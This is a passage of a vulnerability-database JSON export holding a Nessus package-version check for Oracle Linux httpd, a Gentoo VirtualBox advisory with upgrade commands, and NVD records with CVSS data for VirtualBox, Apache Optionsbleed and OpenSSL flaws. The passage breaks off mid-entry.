preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.0.1.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2018-05-23T03:03:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "### 
Background\n\nVirtualBox is a powerful virtualization product from Oracle.\n\n### Description\n\nMultiple vulnerabilities have been discovered in VirtualBox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could take control of VirtualBox resulting in the execution of arbitrary code with the privileges of the process, a Denial of Service condition, or other unspecified impacts. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll VirtualBox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/virtualbox-5.1.36\"\n \n\nAll VirtualBox binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/virtualbox-bin-5.1.36.122089\"", "edition": 1, "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "GLSA-201805-08", "href": "https://security.gentoo.org/glsa/201805-08", "title": "VirtualBox: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2844", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2844"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2844", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.7}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2845", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2845"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2845", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2845", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:39", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if 
httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-18T15:29:00", "title": "CVE-2017-9798", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2020-10-15T16:12:00", "cpe": ["cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.26", "cpe:/a:apache:http_server:2.4.9", 
"cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.2.34", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.27", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4", "cpe:/a:apache:http_server:2.4.25", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:apache:http_server:2.4.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-9798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.25:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. 
Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2860", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2860"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2860", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2860", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). 
Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2843", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2843"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2843", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of 
Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2835", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2835"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2835", "cvss": {"score": 4.4, "vector": 
"AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-10-03T13:07:43", "description": "OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an \"error state\" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. 
OpenSSL 1.1.0 is not affected.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-07T16:29:00", "title": "CVE-2017-3737", "type": "cve", "cwe": ["CWE-125", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3737"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:openssl:openssl:1.0.2h", "cpe:/a:openssl:openssl:1.0.2l", "cpe:/a:openssl:openssl:1.0.2c", "cpe:/a:openssl:openssl:1.0.2b", "cpe:/a:openssl:openssl:1.0.2f", "cpe:/a:openssl:openssl:1.0.2j", "cpe:/a:openssl:openssl:1.0.2d", "cpe:/a:openssl:openssl:1.0.2m", "cpe:/a:openssl:openssl:1.0.2e", "cpe:/a:openssl:openssl:1.0.2i", "cpe:/a:openssl:openssl:1.0.2g", "cpe:/a:openssl:openssl:1.0.2k", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-3737", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3737", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2j:*:*:*:*:*:*:*", 
"cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2m:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2i:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 3.8 (Confidentiality impacts). 
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2831", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2831"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2831", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2831", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2837", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2837"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2837", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. 
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2836", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2836"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2836", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2020-11-18T06:44:57", "bulletinFamily": "info", "cvelist": ["CVE-2017-9798"], "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user\u2019s .htaccess 
